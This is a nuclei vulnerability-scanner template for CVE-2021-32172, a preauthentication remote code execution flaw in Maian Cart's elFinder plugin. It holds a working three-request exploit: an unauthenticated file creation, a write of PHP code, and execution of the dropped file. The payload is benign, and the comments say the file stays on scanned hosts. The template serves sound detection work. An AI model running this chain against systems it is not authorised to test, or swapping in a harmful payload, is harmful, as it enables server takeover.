nuclei-templates/cves/2021/CVE-2021-32172.yaml


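id: CVE-2021-32172

info:
  name: Maian Cart 3.8 preauth RCE
  author: pdteam
  severity: critical
  # Description text is quoted from the vendor's advisory, hence the first person.
  description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.
  reference:
    - https://dreyand.github.io/maian-cart-rce/
    - https://github.com/DreyAnd/maian-cart-rce
    - https://www.maianscriptworld.co.uk/critical-updates
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32172
  tags: cve,cve2021,rce,unauth,maian
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2021-32172
    cwe-id: CWE-862

# INTRUSIVE: this is not a passive check. Request 1 creates a PHP file on the
# target, request 2 writes PHP source into it and request 3 executes it. The
# payload only echoes a random marker, but the dropped file
# `/product-downloads/<randstr>.php` is NOT removed afterwards. Operators must
# clean it up themselves (presumably via the same elFinder endpoint) or accept
# that a web-reachable PHP artifact stays on every vulnerable host scanned.
requests:
  - raw:
      # 1. Unauthenticated `mkfile` through the elFinder connector exposed under
      #    /admin/index.php. `{{randstr}}` is reused in request 3, so the file
      #    name is known up front. `target=l1_Lw` is the elFinder volume/path
      #    hash the file is created in (presumably the volume root - confirm).
      - |
        GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      # 2. Write a minimal PHP body into the new file. `{{hash}}` is supplied by
      #    the extractor below. The URL-encoded content decodes to
      #    `<?php echo "{{randstr_1}}"; ?>` - benign by design, it only prints a
      #    second random marker. A blank line separates headers from the body.
      - |
        POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Language: en-US,en;q=0.5
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e

      # 3. Fetch the dropped file from the web root so the server executes it.
      - |
        GET /product-downloads/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    # Pull the first `"hash":"...",` value out of the mkfile response (assumed
    # to be the hash of the file just created). `internal: true` keeps it out
    # of the results and makes it available to the following requests.
    extractors:
      - type: regex
        name: hash
        internal: true
        group: 1
        regex:
          - '"hash"\:"(.*?)"\,'

    # Evaluate the matcher across all responses of this request chain so that
    # body_3 / status_code_3 refer to request 3.
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          # Match only on proof of execution: the second marker must be echoed
          # back by PHP, not merely accepted by the upload. A 200 on its own
          # would not prove the file ran, so both conditions are ANDed.
          - 'contains(body_3, "{{randstr_1}}")'
          - "status_code_3 == 200"
        condition: and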